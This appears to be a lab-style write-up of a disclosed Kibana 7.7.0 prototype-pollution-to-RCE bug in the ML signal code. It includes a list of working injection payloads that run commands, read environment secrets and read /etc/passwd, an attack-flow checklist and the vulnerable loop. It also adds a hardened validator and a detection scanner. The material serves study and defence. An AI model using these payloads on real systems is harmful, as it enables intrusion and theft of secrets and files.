Kibana 7.7.0
SIEM Detection Engine — Machine Learning rule evaluation via bulk_create_ml_signals.ts
Detection Rules
1 anomaly indexed
| Rule name | Type | Severity | Status | Last response | Actions |
|---|---|---|---|---|---|
| Linux Anomalous Network Activity (ML Job: linux_anomalous_network_activity_ecs · interval: 15s) | Machine Learning | Low | ● Enabled | Fired: 2026-06-05 15:25:12 | |
Elasticsearch API — Index ML Anomaly Document
Step 2 — craft the malicious anomaly document

Rule Execution Log — Signals
Previous execution at 2026-06-05 15:25:12 — Proto pollution: sourceURL · sh: 1: /etc/passwd: Permission denied
...
Payload Reference
influencer_field_name injection payloads
① Detection — arithmetic check
"foo.__proto__.sourceURL": "\u2028\u2029\n;console.log('pwned')"
② Read Node.js version
"foo.__proto__.sourceURL": "\u2028\u2029\n;process.version"
③ Env var exfil — FLAG
"foo.__proto__.sourceURL": "\u2028\u2029\n;process.env.FLAG"
④ RCE — exec command (from report)
"foo.__proto__.sourceURL": "\u2028\u2029\n;global.process.mainModule.require('child_process').exec('id')"
⑤ File read — /etc/passwd
"foo.__proto__.sourceURL": "\u2028\u2029\n;require('fs').readFileSync('/etc/passwd','utf8')"
```ts
// vulnerable code path — bulk_create_ml_signals.ts#L58 (Kibana 7.7.0)
import { set, merge } from 'lodash'; // lodash helpers (import assumed; not shown on the page)

influencers.forEach(inf => {
  const nested = {};
  // BUG: the attacker-controlled influencer_field_name is used directly as a
  // dotted key path, so a segment such as "__proto__" walks into Object.prototype
  set(nested, inf.influencer_field_name, inf.influencer_field_values); // value comes from influencer_field_values (see attack flow)
  merge(signalSource, nested); // ← merges the polluted object into the signal document
});
```
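The hardened counterpart to the loop above, written here as an added example (it is not Kibana's code and not the reporter's): influencer field names are validated before they are ever used as a key path, nested values are only written as own properties on null-prototype containers, and a small scanner flags anomaly documents whose influencer field names carry the prototype-traversal segments seen in the Payload Reference. The function names (`isSafeFieldPath`, `setNestedSafe`, `buildInfluencerFields`, `findPollutionAttempts`) and the `SAMPLE_DOCS` input are assumptions constructed for this example.

```javascript
// Added example (not Kibana's code): validate ML influencer field names before
// they become object key paths, and scan anomaly documents for the
// prototype-pollution pattern described on this page.

// Key segments that let a dotted path walk into Object.prototype.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// True when every segment of a dotted key path is an ordinary field name:
// non-empty and not a prototype-traversal segment.
function isSafeFieldPath(path) {
  if (typeof path !== 'string' || path.length === 0) return false;
  return path.split('.').every(seg => seg.length > 0 && !FORBIDDEN_SEGMENTS.has(seg));
}

// Hardened replacement for `set(nested, inf.influencer_field_name, ...)`:
// rejects unsafe paths up front and only writes own properties on
// null-prototype containers, so a shared prototype is never reachable.
function setNestedSafe(target, path, value) {
  if (!isSafeFieldPath(path)) {
    throw new Error(`refusing unsafe influencer_field_name: ${JSON.stringify(path)}`);
  }
  const segs = path.split('.');
  let node = target;
  for (const seg of segs.slice(0, -1)) {
    const own = Object.prototype.hasOwnProperty.call(node, seg);
    if (!own || typeof node[seg] !== 'object' || node[seg] === null) {
      node[seg] = Object.create(null);
    }
    node = node[seg];
  }
  node[segs[segs.length - 1]] = value;
  return target;
}

// Builds the influencer field map the way the vulnerable loop does, but with
// the safe setter; unsafe influencers are dropped and reported, not merged.
function buildInfluencerFields(influencers) {
  const fields = Object.create(null);
  const rejected = [];
  for (const inf of influencers) {
    try {
      setNestedSafe(fields, inf.influencer_field_name, inf.influencer_field_values);
    } catch (e) {
      rejected.push(inf.influencer_field_name);
    }
  }
  return { fields, rejected };
}

// Detection helper: given anomaly documents (shaped like ML result records),
// return the ids of those whose influencer field names contain
// prototype-traversal segments.
function findPollutionAttempts(docs) {
  return docs
    .filter(doc => (doc.influencers || []).some(inf => !isSafeFieldPath(inf.influencer_field_name)))
    .map(doc => doc.id);
}

// Constructed sample anomaly documents (not real Kibana data). Document a2
// mirrors the key path from the page's Payload Reference.
const SAMPLE_DOCS = [
  { id: 'a1', influencers: [{ influencer_field_name: 'host.name', influencer_field_values: ['web-01'] }] },
  { id: 'a2', influencers: [{ influencer_field_name: 'foo.__proto__.sourceURL', influencer_field_values: ['payload'] }] },
  { id: 'a3', influencers: [
      { influencer_field_name: 'user.name', influencer_field_values: ['svc'] },
      { influencer_field_name: 'constructor.prototype.x', influencer_field_values: ['y'] },
  ] },
];

// Runs the scanner and the hardened builder over the sample set and reports
// whether Object.prototype picked up a sourceURL property along the way.
function demo() {
  const flagged = findPollutionAttempts(SAMPLE_DOCS);
  const { fields, rejected } = buildInfluencerFields(SAMPLE_DOCS.flatMap(d => d.influencers));
  return {
    flagged,
    rejected,
    hostName: fields.host.name[0],
    polluted: ({}).sourceURL !== undefined,
  };
}
```

`findPollutionAttempts` is the piece that belongs in a detection pipeline: run it over the ML results index before documents reach the rule, and alert on any hit. `setNestedSafe` is the code-side fix; the null-prototype containers mean that even a validation gap cannot reach `Object.prototype`.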
Attack Flow
1. Ensure rule is enabled
2. Set influencer_field_name = foo.__proto__.sourceURL
3. Set influencer_field_values = \u2028\u2029\n;[code]
4. Click Send Request — rule fires in ~15s
✓ RCE output appears in Signals log
HackerOne Report Metadata

| Field | Value |
|---|---|
| Report | |
| Researcher | alexbrasetvik |
| Program | Elastic |
| Severity | Critical (9–10) |
| Weakness | Prototype Pollution → RCE |
| Bounty | $5,000 |
| Reported | Apr 28, 2020 |
| Disclosed | Apr 19, 2021 |
| Affected file | bulk_create_ml_signals.ts#L58 |